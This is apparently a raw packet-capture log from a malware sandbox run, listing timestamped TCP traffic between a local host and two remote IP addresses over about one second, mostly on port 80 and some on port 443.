Dec 7, 2024 10:51:53.706758976 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.707484007 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.707530022 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.707688093 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.707726955 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.708400011 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.708455086 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.708489895 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.708539009 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.709317923 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.709372044 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.709441900 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.709495068 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.710262060 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.710305929 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.710325003 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.710366011 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.711169004 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.711216927 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.711281061 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.711328030 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.712017059 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.712065935 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.712131023 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.712173939 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.712996006 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.713150024 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.713159084 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.713186979 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.713872910 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.713928938 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.713963985 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.714000940 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.714770079 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.714835882 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.714855909 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.714891911 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.715650082 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.715706110 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.715740919 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.715780020 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.716555119 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.716614962 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.716741085 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.716799974 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.717458010 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.717519999 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.717552900 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.717592955 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.718411922 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.718467951 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.718497038 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.718538046 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.719325066 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.719372988 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.719408035 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.719445944 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.720288992 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.720339060 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.720355034 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.720395088 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.721090078 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.721158981 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.721223116 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.721265078 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.722019911 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.722076893 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.722109079 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.722152948 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.723095894 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.723160982 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.723160982 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.723201036 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.723819971 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.723874092 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.723948002 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.723994970 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.724766016 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.724817991 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.724896908 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.724947929 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.725662947 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.725713015 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.725749016 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.725791931 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.726537943 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.726598024 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.726630926 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.726670980 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.727463007 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.727519989 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.727539062 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.727582932 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.728352070 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.728403091 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.728441000 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.728483915 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.729298115 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.729351997 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.729597092 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.729650021 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.801918983 CET	443	49836	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:53.802726984 CET	49836	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:53.802740097 CET	443	49836	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:53.803330898 CET	49836	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:53.803334951 CET	443	49836	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:53.805406094 CET	443	49838	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:53.805910110 CET	49838	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:53.805917978 CET	443	49838	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:53.806344986 CET	49838	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:53.806349039 CET	443	49838	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:53.807220936 CET	443	49837	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:53.807730913 CET	49837	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:53.807749987 CET	443	49837	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:53.808429956 CET	49837	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:53.808442116 CET	443	49837	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:53.831511021 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.951628923 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.062341928 CET	443	49834	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:54.062423944 CET	443	49834	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:54.066474915 CET	49834	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:54.066476107 CET	49834	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:54.069711924 CET	49834	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:54.069717884 CET	49839	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:54.069734097 CET	443	49834	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:54.069773912 CET	443	49839	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:54.070461988 CET	49839	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:54.070461988 CET	49839	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:54.070489883 CET	443	49839	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:54.071276903 CET	443	49835	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:54.071346998 CET	443	49835	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:54.071587086 CET	49835	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:54.071587086 CET	49835	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:54.074070930 CET	49835	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:54.074070930 CET	49840	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:54.074096918 CET	443	49835	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:54.074115038 CET	443	49840	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:54.074352980 CET	49840	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:54.078123093 CET	49840	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:54.078135014 CET	443	49840	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:54.236660957 CET	443	49836	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:54.236752987 CET	443	49836	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:54.237081051 CET	49836	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:54.237138033 CET	49836	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:54.237154961 CET	443	49836	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:54.237255096 CET	49836	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:54.237260103 CET	443	49836	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:54.240180969 CET	49841	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:54.240226030 CET	443	49841	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:54.240690947 CET	49841	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:54.240736961 CET	49841	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:54.240742922 CET	443	49841	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:54.241466045 CET	443	49837	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:54.241523981 CET	443	49837	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:54.241677999 CET	49837	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:54.241720915 CET	49837	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:54.241720915 CET	49837	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:54.241739988 CET	443	49837	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:54.241753101 CET	443	49837	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:54.244533062 CET	49842	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:54.244580030 CET	443	49842	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:54.244680882 CET	49842	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:54.244807959 CET	49842	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:54.244828939 CET	443	49842	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:54.274408102 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.274441957 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.274501085 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.274530888 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.274548054 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.274559021 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.274650097 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.275358915 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.275481939 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.275481939 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.275831938 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.276240110 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.276340961 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.276521921 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.277194023 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.277307034 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.277312040 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.277407885 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.278100014 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.278160095 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.278209925 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.278637886 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.404392004 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.404453993 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.404807091 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.404839993 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.404907942 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.404930115 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.405109882 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.405656099 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.405760050 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.405786991 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.406075001 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.406529903 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.406622887 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.406749964 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.406896114 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.407409906 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.407531023 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.407563925 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.407759905 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.408281088 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.408356905 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.408365965 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.408478975 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.409344912 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.409359932 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.409446955 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.409446955 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.410106897 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.410180092 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.410182953 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.410303116 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.411014080 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.411096096 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.411123037 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.411340952 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.411977053 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.412111998 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.412134886 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.412245035 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.412851095 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.412949085 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.412961960 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.413072109 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.413748026 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.413837910 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.535556078 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.535582066 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.535670042 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.535670042 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.535878897 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.536118984 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.536139965 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.536237001 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.536798000 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.536883116 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.536906958 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.537067890 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.537666082 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.537780046 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.537800074 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.538064003 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.538582087 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.538639069 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.538678885 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.538777113 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.539479971 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.539635897 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.539637089 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.539789915 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.540401936 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.540486097 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.540509939 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.540611982 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.541312933 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.541400909 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.541440010 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.541522026 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.542227983 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.542295933 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.542318106 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.542510033 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.543137074 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.543231010 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.543236017 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.543288946 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.544045925 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.544186115 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.544261932 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.544915915 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.545011997 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.545034885 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.545362949 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.545810938 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.545953989 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.545979977 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.546065092 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.546716928 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.546835899 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.546860933 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.547645092 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.547744036 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.547768116 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.547812939 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.548532963 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.548645973 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.548672915 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.548775911 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.549447060 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.549571991 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.549596071 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.550358057 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.550390005 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.550446033 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.550673008 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.551284075 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.551379919 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.551467896 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.552397966 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.552515984 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.552614927 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.553122044 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.553215027 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.553528070 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.554039955 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.554136038 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.554202080 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.554320097 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.554853916 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.554966927 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.663647890 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.663700104 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.663877010 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.663904905 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.664035082 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.664062977 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.664191008 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.664228916 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.664288998 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.665010929 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.665178061 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.665436029 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.665823936 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.665930033 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.665958881 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.666033983 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.666713953 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.666846037 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.666851997 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.666939974 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.667643070 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.667727947 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:54.667757988 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.667895079 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:54.668571949 CET	80	49808	185.215.113.206	192.168.2.6
